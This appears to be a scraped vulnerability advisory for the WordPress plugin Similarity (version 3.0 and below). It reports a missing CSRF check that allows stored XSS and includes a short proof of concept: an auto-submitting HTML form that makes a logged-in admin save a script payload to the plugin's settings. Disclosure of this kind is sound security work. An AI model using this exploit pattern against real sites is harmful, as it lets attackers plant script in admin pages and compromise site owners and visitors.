Lucene search

K
wpexploitBob MatyasWPEX-ID:55DFB9B5-D590-478B-BD1F-D420B79037FA
HistoryMay 24, 2024 - 12:00 a.m.

Similarity <= 3.0 - Stored XSS via CSRF

2024-05-2400:00:00
Bob Matyas
9
stored xss
csrf
poc
june 07 2024
update
exploit

9 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Description The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack

Make a logged in admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=similarity%2Fsimilarity.php" method="post">
        <input type="hidden" name="limit" value='"><script>alert(3)</script>' />
        <input type="hidden" name="update_options" value="Update" />
        <input type="submit" value="Submit" />
    </form>
</body>
```

9 High

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.1%

Related for WPEX-ID:55DFB9B5-D590-478B-BD1F-D420B79037FA